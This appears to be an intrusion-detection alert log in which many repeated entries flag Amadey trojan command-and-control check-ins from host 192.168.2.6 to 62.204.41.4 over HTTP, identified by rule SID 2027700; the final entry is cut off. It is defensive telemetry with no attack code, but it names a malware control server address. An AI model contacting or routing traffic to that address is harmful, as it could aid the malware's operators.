Timestamp:	192.168.2.662.204.41.449985802027700 02/07/23-20:02:03.672175
SID:	2027700
Source Port:	49985
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449814802027700 02/07/23-20:01:15.831910
SID:	2027700
Source Port:	49814
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450169802027700 02/07/23-20:03:00.200665
SID:	2027700
Source Port:	50169
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450166802027700 02/07/23-20:02:59.478159
SID:	2027700
Source Port:	50166
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449750802027700 02/07/23-20:00:58.621945
SID:	2027700
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449899802027700 02/07/23-20:01:39.123661
SID:	2027700
Source Port:	49899
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450270802027700 02/07/23-20:03:27.172191
SID:	2027700
Source Port:	50270
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450255802027700 02/07/23-20:03:20.983533
SID:	2027700
Source Port:	50255
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450077802027700 02/07/23-20:02:33.659592
SID:	2027700
Source Port:	50077
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450010802027700 02/07/23-20:02:13.422325
SID:	2027700
Source Port:	50010
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450258802027700 02/07/23-20:03:21.947679
SID:	2027700
Source Port:	50258
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450347802027700 02/07/23-20:03:46.099227
SID:	2027700
Source Port:	50347
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450449802027700 02/07/23-20:04:11.130604
SID:	2027700
Source Port:	50449
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450420802027700 02/07/23-20:04:04.035367
SID:	2027700
Source Port:	50420
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449919802027700 02/07/23-20:01:44.090733
SID:	2027700
Source Port:	49919
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449931802027700 02/07/23-20:01:50.612148
SID:	2027700
Source Port:	49931
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449801802027700 02/07/23-20:01:12.934086
SID:	2027700
Source Port:	49801
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449842802027700 02/07/23-20:01:22.668685
SID:	2027700
Source Port:	49842
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450023802027700 02/07/23-20:02:16.679938
SID:	2027700
Source Port:	50023
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450372802027700 02/07/23-20:03:52.297867
SID:	2027700
Source Port:	50372
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449753802027700 02/07/23-20:00:59.355095
SID:	2027700
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450153802027700 02/07/23-20:02:56.341247
SID:	2027700
Source Port:	50153
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450242802027700 02/07/23-20:03:17.764359
SID:	2027700
Source Port:	50242
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450461802027700 02/07/23-20:04:14.005420
SID:	2027700
Source Port:	50461
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450331802027700 02/07/23-20:03:42.173293
SID:	2027700
Source Port:	50331
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450194802027700 02/07/23-20:03:06.078733
SID:	2027700
Source Port:	50194
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450201802027700 02/07/23-20:03:07.797561
SID:	2027700
Source Port:	50201
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450408802027700 02/07/23-20:04:01.096954
SID:	2027700
Source Port:	50408
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450112802027700 02/07/23-20:02:42.895840
SID:	2027700
Source Port:	50112
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450283802027700 02/07/23-20:03:30.376799
SID:	2027700
Source Port:	50283
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450064802027700 02/07/23-20:02:30.633740
SID:	2027700
Source Port:	50064
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450319802027700 02/07/23-20:03:39.222800
SID:	2027700
Source Port:	50319
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449843802027700 02/07/23-20:01:22.907370
SID:	2027700
Source Port:	49843
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450110802027700 02/07/23-20:02:42.417578
SID:	2027700
Source Port:	50110
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450171802027700 02/07/23-20:03:00.685944
SID:	2027700
Source Port:	50171
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450364802027700 02/07/23-20:03:50.279050
SID:	2027700
Source Port:	50364
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450462802027700 02/07/23-20:04:14.252136
SID:	2027700
Source Port:	50462
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450012802027700 02/07/23-20:02:13.968224
SID:	2027700
Source Port:	50012
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450073802027700 02/07/23-20:02:32.709344
SID:	2027700
Source Port:	50073
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449999802027700 02/07/23-20:02:10.659483
SID:	2027700
Source Port:	49999
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450459802027700 02/07/23-20:04:13.538198
SID:	2027700
Source Port:	50459
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449745802027700 02/07/23-20:00:57.394746
SID:	2027700
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449941802027700 02/07/23-20:01:53.041040
SID:	2027700
Source Port:	49941
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450401802027700 02/07/23-20:03:59.377764
SID:	2027700
Source Port:	50401
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450009802027700 02/07/23-20:02:13.165566
SID:	2027700
Source Port:	50009
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450107802027700 02/07/23-20:02:41.686560
SID:	2027700
Source Port:	50107
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450205802027700 02/07/23-20:03:08.738599
SID:	2027700
Source Port:	50205
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450303802027700 02/07/23-20:03:35.307803
SID:	2027700
Source Port:	50303
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450168802027700 02/07/23-20:02:59.953138
SID:	2027700
Source Port:	50168
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449938802027700 02/07/23-20:01:52.305588
SID:	2027700
Source Port:	49938
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450266802027700 02/07/23-20:03:26.196925
SID:	2027700
Source Port:	50266
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450299802027700 02/07/23-20:03:34.321474
SID:	2027700
Source Port:	50299
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449778802027700 02/07/23-20:01:04.997293
SID:	2027700
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449815802027700 02/07/23-20:01:16.077954
SID:	2027700
Source Port:	49815
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449871802027700 02/07/23-20:01:32.342194
SID:	2027700
Source Port:	49871
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449773802027700 02/07/23-20:01:04.038338
SID:	2027700
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449913802027700 02/07/23-20:01:42.565044
SID:	2027700
Source Port:	49913
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449974802027700 02/07/23-20:02:00.945242
SID:	2027700
Source Port:	49974
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450241802027700 02/07/23-20:03:17.535341
SID:	2027700
Source Port:	50241
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449876802027700 02/07/23-20:01:33.586090
SID:	2027700
Source Port:	49876
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450143802027700 02/07/23-20:02:53.873531
SID:	2027700
Source Port:	50143
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449720802027700 02/07/23-20:00:51.202653
SID:	2027700
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450045802027700 02/07/23-20:02:22.023470
SID:	2027700
Source Port:	50045
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450397802027700 02/07/23-20:03:58.395001
SID:	2027700
Source Port:	50397
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450037802027700 02/07/23-20:02:20.092570
SID:	2027700
Source Port:	50037
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450233802027700 02/07/23-20:03:15.578132
SID:	2027700
Source Port:	50233
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449781802027700 02/07/23-20:01:05.723794
SID:	2027700
Source Port:	49781
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450392802027700 02/07/23-20:03:57.167562
SID:	2027700
Source Port:	50392
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450434802027700 02/07/23-20:04:07.488023
SID:	2027700
Source Port:	50434
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449868802027700 02/07/23-20:01:31.598757
SID:	2027700
Source Port:	49868
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450196802027700 02/07/23-20:03:06.562601
SID:	2027700
Source Port:	50196
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450238802027700 02/07/23-20:03:16.812392
SID:	2027700
Source Port:	50238
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450406802027700 02/07/23-20:04:00.598596
SID:	2027700
Source Port:	50406
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449740802027700 02/07/23-20:00:56.170997
SID:	2027700
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449810802027700 02/07/23-20:01:15.107347
SID:	2027700
Source Port:	49810
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449851802027700 02/07/23-20:01:24.881497
SID:	2027700
Source Port:	49851
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449946802027700 02/07/23-20:01:54.317743
SID:	2027700
Source Port:	49946
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450311802027700 02/07/23-20:03:37.282022
SID:	2027700
Source Port:	50311
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450274802027700 02/07/23-20:03:28.142137
SID:	2027700
Source Port:	50274
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450470802027700 02/07/23-20:04:16.255518
SID:	2027700
Source Port:	50470
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450020802027700 02/07/23-20:02:15.924236
SID:	2027700
Source Port:	50020
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450078802027700 02/07/23-20:02:33.896004
SID:	2027700
Source Port:	50078
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449905802027700 02/07/23-20:01:40.596381
SID:	2027700
Source Port:	49905
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450369802027700 02/07/23-20:03:51.539852
SID:	2027700
Source Port:	50369
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450115802027700 02/07/23-20:02:43.638524
SID:	2027700
Source Port:	50115
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450328802027700 02/07/23-20:03:41.453966
SID:	2027700
Source Port:	50328
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450439802027700 02/07/23-20:04:08.690442
SID:	2027700
Source Port:	50439
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450246802027700 02/07/23-20:03:18.721408
SID:	2027700
Source Port:	50246
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449900802027700 02/07/23-20:01:39.360455
SID:	2027700
Source Port:	49900
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450148802027700 02/07/23-20:02:55.124323
SID:	2027700
Source Port:	50148
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449884802027700 02/07/23-20:01:35.347764
SID:	2027700
Source Port:	49884
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449921802027700 02/07/23-20:01:45.051140
SID:	2027700
Source Port:	49921
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450421802027700 02/07/23-20:04:04.274057
SID:	2027700
Source Port:	50421
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449798802027700 02/07/23-20:01:12.233155
SID:	2027700
Source Port:	49798
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450127802027700 02/07/23-20:02:47.079664
SID:	2027700
Source Port:	50127
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450454802027700 02/07/23-20:04:12.348170
SID:	2027700
Source Port:	50454
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450102802027700 02/07/23-20:02:40.427300
SID:	2027700
Source Port:	50102
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450200802027700 02/07/23-20:03:07.560016
SID:	2027700
Source Port:	50200
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450356802027700 02/07/23-20:03:48.331429
SID:	2027700
Source Port:	50356
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449737802027700 02/07/23-20:00:55.466122
SID:	2027700
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449835802027700 02/07/23-20:01:20.965850
SID:	2027700
Source Port:	49835
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450163802027700 02/07/23-20:02:58.736661
SID:	2027700
Source Port:	50163
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450418802027700 02/07/23-20:04:03.565176
SID:	2027700
Source Port:	50418
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449918802027700 02/07/23-20:01:43.801204
SID:	2027700
Source Port:	49918
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450098802027700 02/07/23-20:02:39.366201
SID:	2027700
Source Port:	50098
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450282802027700 02/07/23-20:03:30.132022
SID:	2027700
Source Port:	50282
Destination Port:	80
Protocol:	TCP
